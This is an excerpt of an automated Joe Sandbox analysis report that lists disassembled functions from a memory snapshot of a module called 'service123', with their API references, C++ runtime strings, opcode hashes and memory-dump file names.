Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 63a23ee2b42787909d264d45b7ce994d45fbaaa3a8b334c16aa87e6aaf2ec6a3
Instruction ID: c036cadd2fe6a03b3316f977096fb177200fdf869bc826f0960d3d3a973bc516
Opcode Fuzzy Hash: 63a23ee2b42787909d264d45b7ce994d45fbaaa3a8b334c16aa87e6aaf2ec6a3
Instruction Fuzzy Hash: 3C215072A0A3109FC300AF1D988446EFBE4EF99658F95896EF88897311D331D858CB92

Function 6C9FA9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9FA9FD
wcslen.MSVCRT ref: 6C9FAA4D

Strings

basic_string: construction from null is not valid, xrefs: 6C9FAA20, 6C9FAA70

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: df9de9ee350b73721c6d2d094b18e8744b21925bf7d4ae299f6e7fab35f2d983
Instruction ID: b802d48a360222cf3e9714578ca7647b6acaa80701de72733620b64b8a9db4e3
Opcode Fuzzy Hash: df9de9ee350b73721c6d2d094b18e8744b21925bf7d4ae299f6e7fab35f2d983
Instruction Fuzzy Hash: 221163B1915714CBCB11AF2CD1848AABBF8BF59214F06086DE8C49B311D632D999CB96

Function 6C9FA5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9FA60D
wcslen.MSVCRT ref: 6C9FA65D

Strings

basic_string: construction from null is not valid, xrefs: 6C9FA630, 6C9FA680

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: df9de9ee350b73721c6d2d094b18e8744b21925bf7d4ae299f6e7fab35f2d983
Instruction ID: 9c4c89c7947faccfdddbc14a131c7d5c9eaf7e52ddfae17c3dfd9e4700dbc69e
Opcode Fuzzy Hash: df9de9ee350b73721c6d2d094b18e8744b21925bf7d4ae299f6e7fab35f2d983
Instruction Fuzzy Hash: CF1193B1915714CBCB11AF2CC1808AABBF8BF59218F02086DE8C49B311D632D999CB92

Function 6CA098F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6CA0A30E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 7a6374409245471ff6f85fa24755e76eb9bbda0e14247ab70b68e117a7cb34a3
Instruction ID: 0d69dd1d4a7145d876f62cea5f8274532e061f2263b9b1a275df083640381740
Opcode Fuzzy Hash: 7a6374409245471ff6f85fa24755e76eb9bbda0e14247ab70b68e117a7cb34a3
Instruction Fuzzy Hash: 1FA29E35B043588FDB10CF79D58478DBBF2AF46368F288668D869AB692D730DC85CB50

Function 6CA087C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6CA091DE

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: da192d788526c706c42b846730e06f9461eae127746b4ef1e6415bad0c05128c
Instruction ID: 8b2978d910715c20a4aa3fd2a41444d97cf0cb99da932d889b71fc2b48e30808
Opcode Fuzzy Hash: da192d788526c706c42b846730e06f9461eae127746b4ef1e6415bad0c05128c
Instruction Fuzzy Hash: 04A29E70B043598FDB10CF79D58478DBBB2BF463A8F288669D865AB692D730DC85CB40

Function 6CA43690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6CA43710

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 1bbdf691404aca2bff0ad0693c48380db9f19c8ebb0c1ae17602ce78ee329860
Instruction ID: 9802fd77f9da468817aa6bd117b6eb27fdf677ea825fb3de148641d080b4161f
Opcode Fuzzy Hash: 1bbdf691404aca2bff0ad0693c48380db9f19c8ebb0c1ae17602ce78ee329860
Instruction Fuzzy Hash: 130171B150A3419BC300AFAEC18465BFFE4AF91328F99C86DE4C947B11D335D488CB56

Function 6C9FA970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9FA98D

Strings

basic_string: construction from null is not valid, xrefs: 6C9FA9B0

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: cf10a257b0e339d27d02929180b5ded7d391f6422320e8e2ca9a2393916f5bcb
Instruction ID: 4174375a39e1e68bdb69d31217ec9568af12dda826ced36cadd200d707d26dd2
Opcode Fuzzy Hash: cf10a257b0e339d27d02929180b5ded7d391f6422320e8e2ca9a2393916f5bcb
Instruction Fuzzy Hash: B7F054B1915714CFCB00EF2CC18089AB7F8BF55214B46046DD4C49B311D632D999CB95

Function 6C9FA580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9FA59D

Strings

basic_string: construction from null is not valid, xrefs: 6C9FA5C0

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: cf10a257b0e339d27d02929180b5ded7d391f6422320e8e2ca9a2393916f5bcb
Instruction ID: 8d48a7690d9eec41c5a85ee07b9004c92992f7d3864ca920acea71b5248f6b71
Opcode Fuzzy Hash: cf10a257b0e339d27d02929180b5ded7d391f6422320e8e2ca9a2393916f5bcb
Instruction Fuzzy Hash: 75F054B1915714CFCB01EF2CC18089AB7F8BF55214B46086DD4C49B315D732D999CB95

Function 6C9FC510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9FC570
basic_string::substr, xrefs: 6C9FC568

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: a60802982c13572ba25ba56c1a980739f979c6f64e3906d8fa783dea15781a36
Instruction ID: efffaf524a8985d42d11bfbac9bad0e90348e2a9fe598c3341d853dcc98b499d
Opcode Fuzzy Hash: a60802982c13572ba25ba56c1a980739f979c6f64e3906d8fa783dea15781a36
Instruction Fuzzy Hash: AB017C71A082008BC704DF2DC58056AFBF5BBC9304F5489ADE088DB310D631D889CB96

Function 6C9F0740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9F07A0
basic_string::substr, xrefs: 6C9F0798

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 4ef8960ffd9ecabe23555c023420cf75b1aff1b14142893a172cae34741fc52f
Instruction ID: 02c245f7eacdeaaeb51f9cdfff4a2450d689f40c1fe25c06f4ecc254a33ded7a
Opcode Fuzzy Hash: 4ef8960ffd9ecabe23555c023420cf75b1aff1b14142893a172cae34741fc52f
Instruction Fuzzy Hash: C9014B72A0A301AFD708CF29D881A9BFBE1ABC9710F10996DE488D7710C234D8858B82

Function 6CA146E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4014a4862fb67d4b682b06c0a35992846a5ccb10ff97594316c8141a383d886e
Instruction ID: 8124903ddffbe41d2a071964875156770a17a8987337ea3ef41fe9590a5da4e4
Opcode Fuzzy Hash: 4014a4862fb67d4b682b06c0a35992846a5ccb10ff97594316c8141a383d886e
Instruction Fuzzy Hash: A7828F75E082988FDB10CFADC49478DBBF1AF46328F298259D865AFB95C334D885CB41

Function 6CA12CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adfadbbfb172e1707b3d99fa975df013d0d4da943a978606eb3de85e3ef8d419
Instruction ID: b59b1de746d9066618a42935934df8997223c901bb2cdc22325d50cfd8f52fd4
Opcode Fuzzy Hash: adfadbbfb172e1707b3d99fa975df013d0d4da943a978606eb3de85e3ef8d419
Instruction Fuzzy Hash: 02729F70A0A298CFDB11CFA9C48479DBFF1BF0A324F188659D4A5ABB91D374D885CB41

Function 6CA1140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be50163a093a6d5988664ff896896168edc8ecb25def7e816d15f6bb7652219e
Instruction ID: 5328af17dabb4c3350a087867685b13f1cbe1d4b9af83c23c438116f8e6c779f
Opcode Fuzzy Hash: be50163a093a6d5988664ff896896168edc8ecb25def7e816d15f6bb7652219e
Instruction Fuzzy Hash: 7272AE70E08298CFCB10CFA9C4847ADBFF2AF26314F188659D5A5ABB91D335D885CB41

Function 6CA12090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 161818ace5fa5fdd05aea625ddf9b4eff08d90c68bcd6c408ebac92aefc7540b
Instruction ID: 56d083c5368840ae60cc0ae23a9059fe68037595b12a8a1092946058f4afcb8c
Opcode Fuzzy Hash: 161818ace5fa5fdd05aea625ddf9b4eff08d90c68bcd6c408ebac92aefc7540b
Instruction Fuzzy Hash: C1728B70E09299CFDB15CFA9C48878DBBF1AF06324F188759D4A5ABB91D334E885CB41

Function 6CA107D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7979f9d7f9219df9598db4149f6a1d2177420d7adec0c2a554686cc821da89cd
Instruction ID: 6265549740b282450b9909ba21a40525b1d75405c857d41af25e369ffd9601d7
Opcode Fuzzy Hash: 7979f9d7f9219df9598db4149f6a1d2177420d7adec0c2a554686cc821da89cd
Instruction Fuzzy Hash: 26727B70E0D398CFDB10CFA9C59479DBBF1AF06324F188659E4A5ABB81D734A885CB41

Function 6C9FF760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9FF8B3

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: 430a9e8a294db252c2334532ea071e0c2edc861da0be49db90f661173ea0e264
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: AF724874A04259CFCB04CFA8D09459DBBF2BF49318F288699E865AB7A1D731EC42CF51

Function 6CA17A20 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01991288f7ec5895d88ca1eff3b6df60d4f73d8e6a7ff1821ca412806b973e5
Instruction ID: ee33870790089c5587c421dca926bc78352501ffff657d1fb0c6ffa431cef67a
Opcode Fuzzy Hash: b01991288f7ec5895d88ca1eff3b6df60d4f73d8e6a7ff1821ca412806b973e5
Instruction Fuzzy Hash: 9252D170A092489FDB00CF68C4C079DBFF1AF46328F29865AE865ABBD1C735D985CB51

Function 6CA02360 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: 6d91b8117eaca5d4c03442b7e48df633afe1c6227144ab0ffc0f1c368e19e848
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: A7E16875E052598FCB10CFA9E4846CDBBF1AF49358F288269E865A7791D334AC81CF60

Function 6CA2DC70 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: 3be290e92f79344c02ef815ab153e59b3d62e8805f6181b70e59f46776608558
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: 5ED17071E056698FCB10CF68C4806CDBBF1BF49324F5C8259E865AB792D339D981CB90

Function 6CA29B60 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

, xrefs: 6CA29BF8

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2ef55fd2c08359cbd021c8c9dd829b99ee658c9cb434f5ed74407602ce9205ff
Instruction ID: d3fab1e352983a9024c92d2391eb2a04c69d9233279ea27d65287a366235b201
Opcode Fuzzy Hash: 2ef55fd2c08359cbd021c8c9dd829b99ee658c9cb434f5ed74407602ce9205ff
Instruction Fuzzy Hash: 87217F71A143048FCB08EF35DA8499BB7F5AF99208F04C92DE85487705D734D88ECB92

Function 6C9EEB10 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C9EEB50

Memory Dump Source

